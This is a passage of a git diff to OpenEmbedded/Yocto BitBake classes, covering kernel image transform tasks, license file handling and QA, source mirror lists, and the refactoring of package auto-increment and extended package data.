         d.setVar('FILES_' + kname + '-image-' + typelower, '/' + imagedest + '/' + type + '-${KERNEL_VERSION_NAME}' + ' /' + imagedest + '/' + type)
@@ -102,6 +106,8 @@ python __anonymous () {
     # standalone for use by wic and other tools.
     if image:
         d.appendVarFlag('do_bundle_initramfs', 'depends', ' ${INITRAMFS_IMAGE}:do_image_complete')
+    if image and bb.utils.to_boolean(d.getVar('INITRAMFS_IMAGE_BUNDLE')):
+        bb.build.addtask('do_transform_bundled_initramfs', 'do_deploy', 'do_bundle_initramfs', d)
 
     # NOTE: setting INITRAMFS_TASK is for backward compatibility
     #       The preferred method is to set INITRAMFS_IMAGE, because
@@ -137,13 +143,14 @@ do_unpack[cleandirs] += " ${S} ${STAGING_KERNEL_DIR} ${B} ${STAGING_KERNEL_BUILD
 do_clean[cleandirs] += " ${S} ${STAGING_KERNEL_DIR} ${B} ${STAGING_KERNEL_BUILDDIR}"
 python do_symlink_kernsrc () {
     s = d.getVar("S")
-    if s[-1] == '/':
-        # drop trailing slash, so that os.symlink(kernsrc, s) doesn't use s as directory name and fail
-        s=s[:-1]
     kernsrc = d.getVar("STAGING_KERNEL_DIR")
     if s != kernsrc:
         bb.utils.mkdirhier(kernsrc)
         bb.utils.remove(kernsrc, recurse=True)
+        if s[-1] == '/':
+            # drop trailing slash, so that os.symlink(kernsrc, s) doesn't use s as
+            # directory name and fail
+            s = s[:-1]
         if d.getVar("EXTERNALSRC"):
             # With EXTERNALSRC S will not be wiped so we can symlink to it
             os.symlink(s, kernsrc)
@@ -192,6 +199,8 @@ UBOOT_LOADADDRESS ?= "${UBOOT_ENTRYPOINT}"
 KERNEL_EXTRA_ARGS ?= ""
 
 EXTRA_OEMAKE = " HOSTCC="${BUILD_CC} ${BUILD_CFLAGS} ${BUILD_LDFLAGS}" HOSTCPP="${BUILD_CPP}""
+EXTRA_OEMAKE += " HOSTCXX="${BUILD_CXX} ${BUILD_CXXFLAGS} ${BUILD_LDFLAGS}""
+
 KERNEL_ALT_IMAGETYPE ??= ""
 
 copy_initramfs() {
@@ -274,6 +283,14 @@ do_bundle_initramfs () {
 }
 do_bundle_initramfs[dirs] = "${B}"
 
+kernel_do_transform_bundled_initramfs() {
+        # vmlinux.gz is not built by kernel
+	if (echo "${KERNEL_IMAGETYPES}" | grep -wq "vmlinux\.gz"); then
+		gzip -9cn < ${KERNEL_OUTPUT_DIR}/vmlinux.initramfs > ${KERNEL_OUTPUT_DIR}/vmlinux.gz.initramfs
+        fi
+}
+do_transform_bundled_initramfs[dirs] = "${B}"
+
 python do_devshell_prepend () {
     os.environ["LDFLAGS"] = ''
 }
@@ -305,6 +322,10 @@ kernel_do_compile() {
 		export KBUILD_BUILD_TIMESTAMP="$ts"
 		export KCONFIG_NOTIMESTAMP=1
 		bbnote "KBUILD_BUILD_TIMESTAMP: $ts"
+	else
+		ts=`LC_ALL=C date`
+		export KBUILD_BUILD_TIMESTAMP="$ts"
+		bbnote "KBUILD_BUILD_TIMESTAMP: $ts"
 	fi
 	# The $use_alternate_initrd is only set from
 	# do_bundle_initramfs() This variable is specifically for the
@@ -323,12 +344,17 @@ kernel_do_compile() {
 	for typeformake in ${KERNEL_IMAGETYPE_FOR_MAKE} ; do
 		oe_runmake ${typeformake} CC="${KERNEL_CC} $cc_extra " LD="${KERNEL_LD}" ${KERNEL_EXTRA_ARGS} $use_alternate_initrd
 	done
+}
+
+kernel_do_transform_kernel() {
 	# vmlinux.gz is not built by kernel
 	if (echo "${KERNEL_IMAGETYPES}" | grep -wq "vmlinux\.gz"); then
 		mkdir -p "${KERNEL_OUTPUT_DIR}"
 		gzip -9cn < ${B}/vmlinux > "${KERNEL_OUTPUT_DIR}/vmlinux.gz"
 	fi
 }
+do_transform_kernel[dirs] = "${B}"
+addtask transform_kernel after do_compile before do_install
 
 do_compile_kernelmodules() {
 	unset CFLAGS CPPFLAGS CXXFLAGS LDFLAGS MACHINE
@@ -346,6 +372,10 @@ do_compile_kernelmodules() {
 		export KBUILD_BUILD_TIMESTAMP="$ts"
 		export KCONFIG_NOTIMESTAMP=1
 		bbnote "KBUILD_BUILD_TIMESTAMP: $ts"
+	else
+		ts=`LC_ALL=C date`
+		export KBUILD_BUILD_TIMESTAMP="$ts"
+		bbnote "KBUILD_BUILD_TIMESTAMP: $ts"
 	fi
 	if (grep -q -i -e '^CONFIG_MODULES=y$' ${B}/.config); then
 		cc_extra=$(get_cc_option)
@@ -358,6 +388,10 @@ do_compile_kernelmodules() {
 		# other kernel modules and will look at this
 		# file to do symbol lookups
 		cp ${B}/Module.symvers ${STAGING_KERNEL_BUILDDIR}/
+		# 5.10+ kernels have module.lds that we need to copy for external module builds
+		if [ -e "${B}/scripts/module.lds" ]; then
+			install -Dm 0644 ${B}/scripts/module.lds ${STAGING_KERNEL_BUILDDIR}/scripts/module.lds
+		fi
 	else
 		bbnote "no modules to compile"
 	fi
@@ -371,8 +405,8 @@ kernel_do_install() {
 	unset CFLAGS CPPFLAGS CXXFLAGS LDFLAGS MACHINE
 	if (grep -q -i -e '^CONFIG_MODULES=y$' .config); then
 		oe_runmake DEPMOD=echo MODLIB=${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION} INSTALL_FW_PATH=${D}${nonarch_base_libdir}/firmware modules_install
-		rm "${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION}/build"
-		rm "${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION}/source"
+		rm -f "${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION}/build"
+		rm -f "${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION}/source"
 		# If the kernel/ directory is empty remove it to prevent QA issues
 		rmdir --ignore-fail-on-non-empty "${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION}/kernel"
 	else
@@ -384,12 +418,26 @@ kernel_do_install() {
 	#
 	install -d ${D}/${KERNEL_IMAGEDEST}
 	install -d ${D}/boot
+
+	#
+	# When including an initramfs bundle inside a FIT image, the fitImage is created after the install task
+	# by do_assemble_fitimage_initramfs.
+	# This happens after the generation of the initramfs bundle (done by do_bundle_initramfs).
+	# So, at the level of the install task we should not try to install the fitImage. fitImage is still not
+	# generated yet.
+	# After the generation of the fitImage, the deploy task copies the fitImage from the build directory to
+	# the deploy folder.
+	#
+
 	for imageType in ${KERNEL_IMAGETYPES} ; do
-		install -m 0644 ${KERNEL_OUTPUT_DIR}/${imageType} ${D}/${KERNEL_IMAGEDEST}/${imageType}-${KERNEL_VERSION}
-		if [ "${KERNEL_PACKAGE_NAME}" = "kernel" ]; then
-			ln -sf ${imageType}-${KERNEL_VERSION} ${D}/${KERNEL_IMAGEDEST}/${imageType}
+		if [ $imageType != "fitImage" ] || [ "${INITRAMFS_IMAGE_BUNDLE}" != "1" ] ; then
+			install -m 0644 ${KERNEL_OUTPUT_DIR}/${imageType} ${D}/${KERNEL_IMAGEDEST}/${imageType}-${KERNEL_VERSION}
+			if [ "${KERNEL_PACKAGE_NAME}" = "kernel" ]; then
+				ln -sf ${imageType}-${KERNEL_VERSION} ${D}/${KERNEL_IMAGEDEST}/${imageType}
+			fi
 		fi
 	done
+
 	install -m 0644 System.map ${D}/boot/System.map-${KERNEL_VERSION}
 	install -m 0644 .config ${D}/boot/config-${KERNEL_VERSION}
 	install -m 0644 vmlinux ${D}/boot/vmlinux-${KERNEL_VERSION}
@@ -397,7 +445,6 @@ kernel_do_install() {
 	install -d ${D}${sysconfdir}/modules-load.d
 	install -d ${D}${sysconfdir}/modprobe.d
 }
-do_install[prefuncs] += "package_get_auto_pr"
 
 # Must be ran no earlier than after do_kernel_checkout or else Makefile won't be in ${S}/Makefile
 do_kernel_version_sanity_check() {
@@ -563,11 +610,11 @@ do_savedefconfig() {
 do_savedefconfig[nostamp] = "1"
 addtask savedefconfig after do_configure
 
-inherit cml1
+inherit cml1 pkgconfig
 
-KCONFIG_CONFIG_COMMAND_append = " HOSTLDFLAGS='${BUILD_LDFLAGS}'"
+KCONFIG_CONFIG_COMMAND_append = " LD='${KERNEL_LD}' HOSTLDFLAGS='${BUILD_LDFLAGS}'"
 
-EXPORT_FUNCTIONS do_compile do_install do_configure
+EXPORT_FUNCTIONS do_compile do_transform_kernel do_transform_bundled_initramfs do_install do_configure
 
 # kernel-base becomes kernel-${KERNEL_VERSION}
 # kernel-image becomes kernel-image-${KERNEL_VERSION}
@@ -673,7 +720,7 @@ do_sizecheck() {
 		at_least_one_fits=
 		for imageType in ${KERNEL_IMAGETYPES} ; do
 			size=`du -ks ${B}/${KERNEL_OUTPUT_DIR}/$imageType | awk '{print $1}'`
-			if [ $size -ge ${KERNEL_IMAGE_MAXSIZE} ]; then
+			if [ $size -gt ${KERNEL_IMAGE_MAXSIZE} ]; then
 				bbwarn "This kernel $imageType (size=$size(K) > ${KERNEL_IMAGE_MAXSIZE}(K)) is too big for your device."
 			else
 				at_least_one_fits=y
diff --git a/meta/classes/libc-package.bbclass b/meta/classes/libc-package.bbclass
index de3b4250c7..72f489d673 100644
--- a/meta/classes/libc-package.bbclass
+++ b/meta/classes/libc-package.bbclass
@@ -45,6 +45,7 @@ PACKAGE_NO_GCONV ?= "0"
 OVERRIDES_append = ":${TARGET_ARCH}-${TARGET_OS}"
 
 locale_base_postinst_ontarget() {
+mkdir ${libdir}/locale
 localedef --inputfile=${datadir}/i18n/locales/%s --charmap=%s %s
 }
 
@@ -355,7 +356,7 @@ python package_do_split_gconvs () {
                 m.write("\t@echo 'Progress %d/%d'\n" % (i, total))
                 m.write("\t" + makerecipe + "\n\n")
         d.setVar("EXTRA_OEMAKE", "-C %s ${PARALLEL_MAKE}" % (os.path.dirname(makefile)))
-        d.setVarFlag("oe_runmake", "progress", "outof:Progress\s(\d+)/(\d+)")
+        d.setVarFlag("oe_runmake", "progress", r"outof:Progress\s(\d+)/(\d+)")
         bb.note("Executing binary locale generation makefile")
         bb.build.exec_func("oe_runmake", d)
         bb.note("collecting binary locales from locale tree")
diff --git a/meta/classes/license.bbclass b/meta/classes/license.bbclass
index f90176d6c0..806b5069fd 100644
--- a/meta/classes/license.bbclass
+++ b/meta/classes/license.bbclass
@@ -31,7 +31,8 @@ python do_populate_lic() {
             f.write("%s: %s\n" % (key, info[key]))
 }
 
-# it would be better to copy them in do_install_append, but find_license_filesa is python
+PSEUDO_IGNORE_PATHS .= ",${@','.join(((d.getVar('COMMON_LICENSE_DIR') or '') + ' ' + (d.getVar('LICENSE_PATH') or '') + ' ' + d.getVar('COREBASE') + '/meta/COPYING').split())}"
+# it would be better to copy them in do_install:append, but find_license_filesa is python
 python perform_packagecopy_prepend () {
     enabled = oe.data.typed_value('LICENSE_CREATE_PACKAGE', d)
     if d.getVar('CLASSOVERRIDE') == 'class-target' and enabled:
@@ -90,17 +91,17 @@ def copy_license_files(lic_files_paths, destdir):
                     os.link(src, dst)
                 except OSError as err:
                     if err.errno == errno.EXDEV:
-                        # Copy license files if hard-link is not possible even if st_dev is the
+                        # Copy license files if hardlink is not possible even if st_dev is the
                         # same on source and destination (docker container with device-mapper?)
                         canlink = False
                     else:
                         raise
-                # Only chown if we did hardling, and, we're running under pseudo
+                # Only chown if we did hardlink and we're running under pseudo
                 if canlink and os.environ.get('PSEUDO_DISABLED') == '0':
                     os.chown(dst,0,0)
             if not canlink:
-                begin_idx = int(beginline)-1 if beginline is not None else None
-                end_idx = int(endline) if endline is not None else None
+                begin_idx = max(0, int(beginline) - 1) if beginline is not None else None
+                end_idx = max(0, int(endline)) if endline is not None else None
                 if begin_idx is None and end_idx is None:
                     shutil.copyfile(src, dst)
                 else:
@@ -152,6 +153,10 @@ def find_license_files(d):
             find_license(node.s.replace("+", "").replace("*", ""))
             self.generic_visit(node)
 
+        def visit_Constant(self, node):
+            find_license(node.value.replace("+", "").replace("*", ""))
+            self.generic_visit(node)
+
     def find_license(license_type):
         try:
             bb.utils.mkdirhier(gen_lic_dest)
diff --git a/meta/classes/license_image.bbclass b/meta/classes/license_image.bbclass
index a8c72da3cb..325b3cbba7 100644
--- a/meta/classes/license_image.bbclass
+++ b/meta/classes/license_image.bbclass
@@ -1,3 +1,5 @@
+ROOTFS_LICENSE_DIR = "${IMAGE_ROOTFS}/usr/share/common-licenses"
+
 python write_package_manifest() {
     # Get list of installed packages
     license_image_dir = d.expand('${LICENSE_DIRECTORY}/${IMAGE_NAME}')
@@ -7,8 +9,8 @@ python write_package_manifest() {
 
     pkgs = image_list_installed_packages(d)
     output = format_pkg_list(pkgs)
-    open(os.path.join(license_image_dir, 'package.manifest'),
-        'w+').write(output)
+    with open(os.path.join(license_image_dir, 'package.manifest'), "w+") as package_manifest:
+        package_manifest.write(output)
 }
 
 python license_create_manifest() {
@@ -105,8 +107,7 @@ def write_license_files(d, license_manifest, pkg_dic, rootfs=True):
     copy_lic_manifest = d.getVar('COPY_LIC_MANIFEST')
     copy_lic_dirs = d.getVar('COPY_LIC_DIRS')
     if rootfs and copy_lic_manifest == "1":
-        rootfs_license_dir = os.path.join(d.getVar('IMAGE_ROOTFS'), 
-                                'usr', 'share', 'common-licenses')
+        rootfs_license_dir = d.getVar('ROOTFS_LICENSE_DIR')
         bb.utils.mkdirhier(rootfs_license_dir)
         rootfs_license_manifest = os.path.join(rootfs_license_dir,
                 os.path.split(license_manifest)[1])
@@ -125,7 +126,6 @@ def write_license_files(d, license_manifest, pkg_dic, rootfs=True):
 
                 licenses = os.listdir(pkg_license_dir)
                 for lic in licenses:
-                    rootfs_license = os.path.join(rootfs_license_dir, lic)
                     pkg_license = os.path.join(pkg_license_dir, lic)
                     pkg_rootfs_license = os.path.join(pkg_rootfs_license_dir, lic)
 
@@ -144,11 +144,14 @@ def write_license_files(d, license_manifest, pkg_dic, rootfs=True):
                                 bad_licenses) == False:
                             continue
 
+                        # Make sure we use only canonical name for the license file
+                        generic_lic_file = "generic_%s" % generic_lic
+                        rootfs_license = os.path.join(rootfs_license_dir, generic_lic_file)
                         if not os.path.exists(rootfs_license):
                             oe.path.copyhardlink(pkg_license, rootfs_license)
 
                         if not os.path.exists(pkg_rootfs_license):
-                            os.symlink(os.path.join('..', lic), pkg_rootfs_license)
+                            os.symlink(os.path.join('..', generic_lic_file), pkg_rootfs_license)
                     else:
                         if (oe.license.license_ok(canonical_license(d,
                                 lic), bad_licenses) == False or
@@ -208,9 +211,10 @@ def get_deployed_dependencies(d):
     deploy = {}
     # Get all the dependencies for the current task (rootfs).
     taskdata = d.getVar("BB_TASKDEPDATA", False)
+    pn = d.getVar("PN")
     depends = list(set([dep[0] for dep
                     in list(taskdata.values())
-                    if not dep[0].endswith("-native")]))
+                    if not dep[0].endswith("-native") and not dep[0] == pn]))
 
     # To verify what was deployed it checks the rootfs dependencies against
     # the SSTATE_MANIFESTS for "deploy" task.
@@ -254,3 +258,13 @@ python do_populate_lic_deploy() {
 addtask populate_lic_deploy before do_build after do_image_complete
 do_populate_lic_deploy[recrdeptask] += "do_populate_lic do_deploy"
 
+python license_qa_dead_symlink() {
+    import os
+
+    for root, dirs, files in os.walk(d.getVar('ROOTFS_LICENSE_DIR')):
+        for file in files:
+            full_path = root + "/" + file
+            if os.path.islink(full_path) and not os.path.exists(full_path):
+                bb.error("broken symlink: " + full_path)
+}
+IMAGE_QA_COMMANDS += "license_qa_dead_symlink"
diff --git a/meta/classes/linux-dummy.bbclass b/meta/classes/linux-dummy.bbclass
new file mode 100644
index 0000000000..cd8791557d
--- /dev/null
+++ b/meta/classes/linux-dummy.bbclass
@@ -0,0 +1,26 @@
+
+python __anonymous () {
+    if d.getVar('PREFERRED_PROVIDER_virtual/kernel') == 'linux-dummy':
+        # copy part codes from kernel.bbclass
+        kname = d.getVar('KERNEL_PACKAGE_NAME') or "kernel"
+
+        # set an empty package of kernel-devicetree
+        d.appendVar('PACKAGES', ' %s-devicetree' % kname)
+        d.setVar('ALLOW_EMPTY_%s-devicetree' % kname, '1')
+
+        # Merge KERNEL_IMAGETYPE and KERNEL_ALT_IMAGETYPE into KERNEL_IMAGETYPES
+        type = d.getVar('KERNEL_IMAGETYPE') or ""
+        alttype = d.getVar('KERNEL_ALT_IMAGETYPE') or ""
+        types = d.getVar('KERNEL_IMAGETYPES') or ""
+        if type not in types.split():
+            types = (type + ' ' + types).strip()
+        if alttype not in types.split():
+            types = (alttype + ' ' + types).strip()
+
+        # set empty packages of kernel-image-*
+        for type in types.split():
+            typelower = type.lower()
+            d.appendVar('PACKAGES', ' %s-image-%s' % (kname, typelower))
+            d.setVar('ALLOW_EMPTY_%s-image-%s' % (kname, typelower), '1')
+}
+
diff --git a/meta/classes/linuxloader.bbclass b/meta/classes/linuxloader.bbclass
index ec0e0556dd..796ab3afe4 100644
--- a/meta/classes/linuxloader.bbclass
+++ b/meta/classes/linuxloader.bbclass
@@ -1,6 +1,6 @@
 def get_musl_loader_arch(d):
     import re
-    ldso_arch = None
+    ldso_arch = "NotSupported"
 
     targetarch = d.getVar("TARGET_ARCH")
     if targetarch.startswith("microblaze"):
@@ -30,7 +30,7 @@ def get_musl_loader(d):
 def get_glibc_loader(d):
     import re
 
-    dynamic_loader = None
+    dynamic_loader = "NotSupported"
     targetarch = d.getVar("TARGET_ARCH")
     if targetarch in ["powerpc", "microblaze"]:
         dynamic_loader = "${base_libdir}/ld.so.1"
@@ -56,7 +56,7 @@ def get_linuxloader(d):
     overrides = d.getVar("OVERRIDES").split(":")
 
     if "libc-baremetal" in overrides:
-        return None
+        return "NotSupported"
 
     if "libc-musl" in overrides:
         dynamic_loader = get_musl_loader(d)
diff --git a/meta/classes/metadata_scm.bbclass b/meta/classes/metadata_scm.bbclass
index 58bb4c555a..47cb969b8d 100644
--- a/meta/classes/metadata_scm.bbclass
+++ b/meta/classes/metadata_scm.bbclass
@@ -1,6 +1,3 @@
-METADATA_BRANCH ?= "${@base_detect_branch(d)}"
-METADATA_REVISION ?= "${@base_detect_revision(d)}"
-
 def base_detect_revision(d):
     path = base_get_scmbasepath(d)
     return base_get_metadata_git_revision(path, d)
@@ -40,3 +37,8 @@ def base_get_metadata_git_revision(path, d):
     except bb.process.ExecutionError:
         rev = '<unknown>'
     return rev.strip()
+
+METADATA_BRANCH := "${@base_detect_branch(d)}"
+METADATA_BRANCH[vardepvalue] = "${METADATA_BRANCH}"
+METADATA_REVISION := "${@base_detect_revision(d)}"
+METADATA_REVISION[vardepvalue] = "${METADATA_REVISION}"
diff --git a/meta/classes/mirrors.bbclass b/meta/classes/mirrors.bbclass
index 87bba41472..669d0cc8ff 100644
--- a/meta/classes/mirrors.bbclass
+++ b/meta/classes/mirrors.bbclass
@@ -29,7 +29,6 @@ ftp://dante.ctan.org/tex-archive ftp://ftp.fu-berlin.de/tex/CTAN \n \
 ftp://dante.ctan.org/tex-archive http://sunsite.sut.ac.jp/pub/archives/ctan/ \n \
 ftp://dante.ctan.org/tex-archive http://ctan.unsw.edu.au/ \n \
 ftp://ftp.gnutls.org/gcrypt/gnutls ${GNUPG_MIRROR}/gnutls \n \
-http://ftp.info-zip.org/pub/infozip/src/ http://mirror.switch.ch/ftp/mirror/infozip/src/ \n \
 http://ftp.info-zip.org/pub/infozip/src/ ftp://sunsite.icm.edu.pl/pub/unix/archiving/info-zip/src/ \n \
 http://www.mirrorservice.org/sites/lsof.itap.purdue.edu/pub/tools/unix/lsof/ http://www.mirrorservice.org/sites/lsof.itap.purdue.edu/pub/tools/unix/lsof/OLD/ \n \
 ${APACHE_MIRROR}  http://www.us.apache.org/dist \n \
@@ -43,6 +42,7 @@ ftp://sourceware.org/pub http://ftp.gwdg.de/pub/linux/sources.redhat.com/sourcew
 cvs://.*/.*     http://downloads.yoctoproject.org/mirror/sources/ \n \
 svn://.*/.*     http://downloads.yoctoproject.org/mirror/sources/ \n \
 git://.*/.*     http://downloads.yoctoproject.org/mirror/sources/ \n \
+gitsm://.*/.*     http://downloads.yoctoproject.org/mirror/sources/ \n \
 hg://.*/.*      http://downloads.yoctoproject.org/mirror/sources/ \n \
 bzr://.*/.*     http://downloads.yoctoproject.org/mirror/sources/ \n \
 p4://.*/.*      http://downloads.yoctoproject.org/mirror/sources/ \n \
@@ -53,6 +53,7 @@ npm://.*/?.*    http://downloads.yoctoproject.org/mirror/sources/ \n \
 cvs://.*/.*     http://sources.openembedded.org/ \n \
 svn://.*/.*     http://sources.openembedded.org/ \n \
 git://.*/.*     http://sources.openembedded.org/ \n \
+gitsm://.*/.*     http://sources.openembedded.org/ \n \
 hg://.*/.*      http://sources.openembedded.org/ \n \
 bzr://.*/.*     http://sources.openembedded.org/ \n \
 p4://.*/.*      http://sources.openembedded.org/ \n \
@@ -62,6 +63,8 @@ ftp://.*/.*     http://sources.openembedded.org/ \n \
 npm://.*/?.*    http://sources.openembedded.org/ \n \
 ${CPAN_MIRROR}  http://cpan.metacpan.org/ \n \
 ${CPAN_MIRROR}  http://search.cpan.org/CPAN/ \n \
+https?$://downloads.yoctoproject.org/releases/uninative/ https://mirrors.kernel.org/yocto/uninative/ \n \
+https?$://downloads.yoctoproject.org/mirror/sources/ https://mirrors.kernel.org/yocto-sources/ \n \
 "
 
 # Use MIRRORS to provide git repo fallbacks using the https protocol, for cases
diff --git a/meta/classes/multilib.bbclass b/meta/classes/multilib.bbclass
index ee677da1e2..b5c59ac593 100644
--- a/meta/classes/multilib.bbclass
+++ b/meta/classes/multilib.bbclass
@@ -45,6 +45,7 @@ python multilib_virtclass_handler () {
         e.data.setVar("RECIPE_SYSROOT", "${WORKDIR}/recipe-sysroot")
         e.data.setVar("STAGING_DIR_TARGET", "${WORKDIR}/recipe-sysroot")
         e.data.setVar("STAGING_DIR_HOST", "${WORKDIR}/recipe-sysroot")
+        e.data.setVar("RECIPE_SYSROOT_MANIFEST_SUBDIR", "nativesdk-" + variant)
         e.data.setVar("MLPREFIX", variant + "-")
         override = ":virtclass-multilib-" + variant
         e.data.setVar("OVERRIDES", e.data.getVar("OVERRIDES", False) + override)
@@ -106,7 +107,6 @@ python __anonymous () {
         d.setVar("LINGUAS_INSTALL", "")
         # FIXME, we need to map this to something, not delete it!
         d.setVar("PACKAGE_INSTALL_ATTEMPTONLY", "")
-        bb.build.deltask('do_populate_sdk', d)
         bb.build.deltask('do_populate_sdk_ext', d)
         return
 
diff --git a/meta/classes/nativesdk.bbclass b/meta/classes/nativesdk.bbclass
index 7f2692c51a..dc5a9756b6 100644
--- a/meta/classes/nativesdk.bbclass
+++ b/meta/classes/nativesdk.bbclass
@@ -113,3 +113,5 @@ do_packagedata[stamp-extra-info] = ""
 USE_NLS = "${SDKUSE_NLS}"
 
 OLDEST_KERNEL = "${SDK_OLDEST_KERNEL}"
+
+PATH_prepend = "${COREBASE}/scripts/nativesdk-intercept:"
diff --git a/meta/classes/npm.bbclass b/meta/classes/npm.bbclass
index 068032a1e5..bd01e247cd 100644
--- a/meta/classes/npm.bbclass
+++ b/meta/classes/npm.bbclass
@@ -17,8 +17,10 @@
 #  NPM_INSTALL_DEV:
 #       Set to 1 to also install devDependencies.
 
+inherit python3native
+
 DEPENDS_prepend = "nodejs-native "
-RDEPENDS_${PN}_prepend = "nodejs "
+RDEPENDS_${PN}_append_class-target = " nodejs"
 
 NPM_INSTALL_DEV ?= "0"
 
@@ -237,9 +239,7 @@ python npm_do_compile() {
         sysroot = d.getVar("RECIPE_SYSROOT_NATIVE")
         nodedir = os.path.join(sysroot, d.getVar("prefix_native").strip("/"))
         configs.append(("nodedir", nodedir))
-        bindir = os.path.join(sysroot, d.getVar("bindir_native").strip("/"))
-        pythondir = os.path.join(bindir, "python-native", "python")
-        configs.append(("python", pythondir))
+        configs.append(("python", d.getVar("PYTHON")))
 
         # Add node-pre-gyp configuration
         args.append(("target_arch", d.getVar("NPM_ARCH")))
diff --git a/meta/classes/package.bbclass b/meta/classes/package.bbclass
index cc64ddffc3..49d30caef7 100644
--- a/meta/classes/package.bbclass
+++ b/meta/classes/package.bbclass
@@ -7,7 +7,7 @@
 #
 # There are the following default steps but PACKAGEFUNCS can be extended:
 #
-# a) package_get_auto_pr - get PRAUTO from remote PR service
+# a) package_convert_pr_autoinc - convert AUTOINC in PKGV to ${PRSERV_PV_AUTOINC}
 #
 # b) perform_packagecopy - Copy D into PKGD
 #
@@ -585,12 +585,20 @@ def runtime_mapping_rename (varname, pkg, d):
     #bb.note("%s after: %s" % (varname, d.getVar(varname)))
 
 #
-# Package functions suitable for inclusion in PACKAGEFUNCS
+# Used by do_packagedata (and possibly other routines post do_package)
 #
 
+package_get_auto_pr[vardepsexclude] = "BB_TASKDEPDATA"
 python package_get_auto_pr() {
     import oe.prservice
-    import re
+
+    def get_do_package_hash(pn):
+        if d.getVar("BB_RUNTASK") != "do_package":
+            taskdepdata = d.getVar("BB_TASKDEPDATA", False)
+            for dep in taskdepdata:
+                if taskdepdata[dep][1] == "do_package" and taskdepdata[dep][0] == pn:
+                    return taskdepdata[dep][6]
+        return None
 
     # Support per recipe PRSERV_HOST
     pn = d.getVar('PN')
@@ -602,15 +610,22 @@ python package_get_auto_pr() {
 
     # PR Server not active, handle AUTOINC
     if not d.getVar('PRSERV_HOST'):
-        if 'AUTOINC' in pkgv:
-            d.setVar("PKGV", pkgv.replace("AUTOINC", "0"))
+        d.setVar("PRSERV_PV_AUTOINC", "0")
         return
 
     auto_pr = None
     pv = d.getVar("PV")
     version = d.getVar("PRAUTOINX")
     pkgarch = d.getVar("PACKAGE_ARCH")
-    checksum = d.getVar("BB_TASKHASH")
+    checksum = get_do_package_hash(pn)
+
+    # If do_package isn't in the dependencies, we can't get the checksum...
+    if not checksum:
+        bb.warn('Task %s requested do_package unihash, but it was not available.' % d.getVar('BB_RUNTASK'))
+        #taskdepdata = d.getVar("BB_TASKDEPDATA", False)
+        #for dep in taskdepdata:
+        #    bb.warn('%s:%s = %s' % (taskdepdata[dep][0], taskdepdata[dep][1], taskdepdata[dep][6]))
+        return
 
     if d.getVar('PRSERV_LOCKDOWN'):
         auto_pr = d.getVar('PRAUTO_' + version + '_' + pkgarch) or d.getVar('PRAUTO_' + version) or None
@@ -628,7 +643,7 @@ python package_get_auto_pr() {
                 srcpv = bb.fetch2.get_srcrev(d)
                 base_ver = "AUTOINC-%s" % version[:version.find(srcpv)]
                 value = conn.getPR(base_ver, pkgarch, srcpv)
-                d.setVar("PKGV", pkgv.replace("AUTOINC", str(value)))
+                d.setVar("PRSERV_PV_AUTOINC", str(value))
 
             auto_pr = conn.getPR(version, pkgarch, checksum)
     except Exception as e:
@@ -638,6 +653,22 @@ python package_get_auto_pr() {
     d.setVar('PRAUTO',str(auto_pr))
 }
 
+#
+# Package functions suitable for inclusion in PACKAGEFUNCS
+#
+
+python package_convert_pr_autoinc() {
+    pkgv = d.getVar("PKGV")
+
+    # Adjust pkgv as necessary...
+    if 'AUTOINC' in pkgv:
+        d.setVar("PKGV", pkgv.replace("AUTOINC", "${PRSERV_PV_AUTOINC}"))
+
+    # Change PRSERV_PV_AUTOINC and EXTENDPRAUTO usage to special values
+    d.setVar('PRSERV_PV_AUTOINC', '@PRSERV_PV_AUTOINC@')
+    d.setVar('EXTENDPRAUTO', '@EXTENDPRAUTO@')
+}
+
 LOCALEBASEPN ??= "${PN}"
 
 python package_do_split_locales() {
@@ -1109,6 +1140,14 @@ python split_and_strip_files () {
                 # Modified the file so clear the cache
                 cpath.updatecache(file)
 
+    def strip_pkgd_prefix(f):
+        nonlocal dvar
+
+        if f.startswith(dvar):
+            return f[len(dvar):]
+
+        return f
+
     #
     # First lets process debug splitting
     #
@@ -1122,6 +1161,8 @@ python split_and_strip_files () {
                 for file in staticlibs:
                     results.append( (file,source_info(file, d)) )
 
+        d.setVar("PKGDEBUGSOURCES", {strip_pkgd_prefix(f): sorted(s) for f, s in results})
+
         sources = set()
         for r in results:
             sources.update(r[1])
@@ -1429,6 +1470,7 @@ PKGDATA_VARS = "PN PE PV PR PKGE PKGV PKGR LICENSE DESCRIPTION SUMMARY RDEPENDS
 python emit_pkgdata() {
     from glob import glob
     import json
+    import gzip
 
     def process_postinst_on_target(pkg, mlprefix):
         pkgval = d.getVar('PKG_%s' % pkg)
@@ -1501,6 +1543,8 @@ fi
     with open(data_file, 'w') as fd:
         fd.write("PACKAGES: %s\n" % packages)
 
+    pkgdebugsource = d.getVar("PKGDEBUGSOURCES") or []
+
     pn = d.getVar('PN')
     global_variants = (d.getVar('MULTILIB_GLOBAL_VARIANTS') or "").split()
     variants = (d.getVar('MULTILIB_VARIANTS') or "").split()
@@ -1520,17 +1564,32 @@ fi
             pkgval = pkg
             d.setVar('PKG_%s' % pkg, pkg)
 
+        extended_data = {
+            "files_info": {}
+        }
+
         pkgdestpkg = os.path.join(pkgdest, pkg)
         files = {}
+        files_extra = {}
         total_size = 0
         seen = set()
         for f in pkgfiles[pkg]:
-            relpth = os.path.relpath(f, pkgdestpkg)
+            fpath = os.sep + os.path.relpath(f, pkgdestpkg)
+
             fstat = os.lstat(f)
-            files[os.sep + relpth] = fstat.st_size
+            files[fpath] = fstat.st_size
+
+            extended_data["files_info"].setdefault(fpath, {})
+            extended_data["files_info"][fpath]['size'] = fstat.st_size
+
             if fstat.st_ino not in seen:
                 seen.add(fstat.st_ino)
                 total_size += fstat.st_size
+
+            if fpath in pkgdebugsource:
+                extended_data["files_info"][fpath]['debugsrc'] = pkgdebugsource[fpath]
+                del pkgdebugsource[fpath]
+
         d.setVar('FILES_INFO', json.dumps(files, sort_keys=True))
 
         process_postinst_on_target(pkg, d.getVar("MLPREFIX"))
@@ -1551,6 +1610,10 @@ fi
 
             sf.write('%s_%s: %d\n' % ('PKGSIZE', pkg, total_size))
 
+        subdata_extended_file = pkgdatadir + "/extended/%s.json.gz" % pkg
+        with gzip.open(subdata_extended_file, "wt", encoding="utf-8") as f:
